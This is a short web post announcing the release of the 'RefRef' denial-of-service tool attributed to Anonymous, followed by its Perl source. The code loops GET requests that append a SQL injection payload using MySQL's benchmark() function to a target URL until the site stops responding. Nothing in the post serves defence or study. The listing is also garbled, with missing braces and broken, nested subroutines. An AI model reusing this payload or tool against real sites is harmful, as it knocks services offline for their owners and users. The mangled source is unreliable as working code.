DDOS tool of Anon #RefRef Source Code is Now Available !

Long Awaited DDOS tool of Anon #RefRef Source Code is Now Available. The tool has been programed in perl, python & javascript. First it was tested on pastebin, and as expected it get success. 

Source Code Of #RefRef :

#RefRef (C) Anonymous 2011
use LWP::UserAgent;
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: Gecko/20080201Firefox/");
if($ARGV[0]) {
} else {
sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
sub adios {
print "\n[+] Stoping attack\n";
sub head {
print "\n\n-- == #RefRef == --\n\n";
sub copyright {
print "\n\n-- == RefRef == --\n\n";
sub sintax {
print "\n[+] Sintax : $0 \n";
sub toma {
return $nave->get($_[0]);
# ¿ The End ?

This code is provided by Anonymous on the official website of the tool  HERE

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